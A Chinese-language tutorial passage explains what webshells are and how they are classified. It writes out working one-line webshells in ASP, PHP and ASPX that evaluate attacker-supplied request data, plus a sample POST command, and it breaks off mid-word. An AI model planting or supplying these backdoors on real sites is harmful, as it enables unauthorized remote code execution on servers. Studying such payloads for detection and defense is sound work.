webshell详解
1)web框架图
2)webshell
Webshell最开始用于网站管理人员对网站管理的入口,后被黑客利用,变成一种恶意脚本,用于给网站植入后门。
web---提供web资源访问的服务器。
shell---web服务器执行操作的环境。
webshell---简单来说就是入侵网站的后门工具。
Webshell分类:
根据木马文件:大马,小马;
根据脚本语言:PHP、JSP、ASP等。
3)一句话木马基本形态
一句话木马,又称小马、网马、后门。即利用简单少量代码实现命令执行、文件管理等目的。
/asp一句话木马/ :<%execute (request("value"))%>
/php一句话木马/ :<?php @eval($_POST[‘value’]);?>
/aspx一句话木马/ :<%@ Page Language="Jscript"%>
<%eval(Request.Item["value"])%>
4)文件上传工具及木马
<?php @eval($_POST['cmd']);?> //POST的数据例如:cmd=phpinfo();
<?php @eval(phpinfo(););?>
<?php phpinfo();?>
5)一句话木马构造方法
基本构造:最开头构造的是脚本开始的标记,例如php环境为<?p